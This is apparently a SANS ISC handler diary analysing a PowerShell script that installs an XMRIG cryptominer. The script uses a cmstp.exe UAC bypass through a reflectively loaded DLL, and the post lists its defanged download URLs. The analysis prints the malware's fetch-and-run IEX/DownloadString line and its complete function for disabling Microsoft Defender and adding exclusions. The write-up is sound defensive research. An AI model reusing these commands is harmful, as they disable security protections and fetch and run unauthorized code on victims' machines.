Bypassing UAC to Install a Cryptominer, (Thu, Dec 26th)

First of all, Merry Christmas to all our readers! I hope you’re enjoying the break with your family and friends! Even if everything slows down in this period, there is always malicious activity ongoing. I found a small PowerShell script that looked interesting for a quick diary. First of all, it has a VT score of 2/60[1]. It installs a cryptominer and its most interesting feature is the use of a classic technique to bypass UAC[2].

To achieve this, it uses the cmstp.exe tool and a DLL. This binary is used by the Microsoft Connection Manager Profile Installer to deploy .inf files.  It is located in C:\Windows\System32\ or C:\Windows\SysWOW64\ which are listed as trusted directories by AppLocker.

First, the script kills existing cmstp.exe processed running:

cmd.exe /C taskkill /IM cmstp.exe /f;

Then, it implements a function to bypass UAC by loading a malicious DLL:

function Bypass-UAC
{ Param([Parameter(Mandatory = $true, Position = 0)][string]$Command) if(-not ([System.Management.Automation.PSTypeName]"CMSTPBypass").Type) { $a = $a + "<base64_data>"; $a = $a + "<base64_data>; ... $a = $a + "<base64_data>"; [Reflection.Assembly]::Load([Convert]::FromBase64String("$a")) | Out-Null } [CMSTPBypass]::Execute($Command)
}

This technique is not new and has been borrowed by the developers from another source[3]. The loaded DLL is well-know on VT and has a decent score: 26/66[4].

This function is used to grab and launch extra PowerShell scripts:

IEX (New-Object Net.WebClient).DownloadString('hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner')

Multiple URLs are visited and extra code downloaded:

hxxp://trsurl[.]com/sa/UAC_WIN_10_Run_Miner > hxxps://hastebin[.]com/raw/odazicisiq > hxxp://trsurl[.]com/sa/Miner > hxxps://hastebin[.]com/raw/sidodoquse

The miner is a simple XMRIG with user ID: 42PkwcWLCjheUAaXy2h6CndY9DoKvv4pQ6QogCxgnFFF268ueYNb2FXiLCgQeds64jAytuaXzFTctbsujZYzUuaRVhn8Cjd. Besides the classic function to “seek & hunt” unwanted processes (AV and other competing miners), there is an interesting function used to disable Microsoft Defender:

function disable_defender{ Set-MpPreference -DisableRealtimeMonitoring $true -ErrorAction Ignore; Set-MpPreference -DisableBehaviorMonitoring $true -ErrorAction Ignore; Set-MpPreference -DisableBlockAtFirstSeen $true -ErrorAction Ignore; Set-MpPreference -DisableIOAVProtection $true -ErrorAction Ignore; Set-MpPreference -DisablePrivacyMode $true -ErrorAction Ignore; Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -ErrorAction Ignore; Set-MpPreference -DisableArchiveScanning $true -ErrorAction Ignore; Set-MpPreference -DisableIntrusionPreventionSystem $true -ErrorAction Ignore; Set-MpPreference -DisableScriptScanning $true -ErrorAction Ignore; Set-MpPreference -SubmitSamplesConsent 2 -ErrorAction Ignore; Set-MpPreference -MAPSReporting 0 -ErrorAction Ignore; Set-MpPreference -HighThreatDefaultAction 6 -Force -ErrorAction Ignore; Set-MpPreference -ModerateThreatDefaultAction 6 -ErrorAction Ignore; Set-MpPreference -LowThreatDefaultAction 6 -ErrorAction Ignore; Set-MpPreference -SevereThreatDefaultAction 6 -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\Users\Public\Libraries\ -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\Users\Public\Libraries -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\win32.zip -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\x32\ -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\win64.zip -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\x64\ -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\x64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1-gcc-win64\xmrig-2.3.1 -ErrorAction Ignore; Add-MpPreference -ExclusionPath C:\ProgramData\x32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1-gcc-win32\xmrig-2.3.1 -ErrorAction Ignore; Add-MpPreference -ExclusionProcess "xmrig.exe" -ErrorAction Ignore; Add-MpPreference -ExclusionExtension ".exe" -ErrorAction Ignore;
}

[1] https://www.virustotal.com/gui/file/c5ec59f873fe31025703855a2406845199d2da221738d3c76daa3b9996c6cd14/detection
[2] https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works
[3] https://www.who-ami.net/how-to-bypass-uac-in-newer-windows-versions/
[4] https://www.virustotal.com/gui/file/da9fc045098c3502920dee3fe65660de0049792307605f89b08361e28ce74dad/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key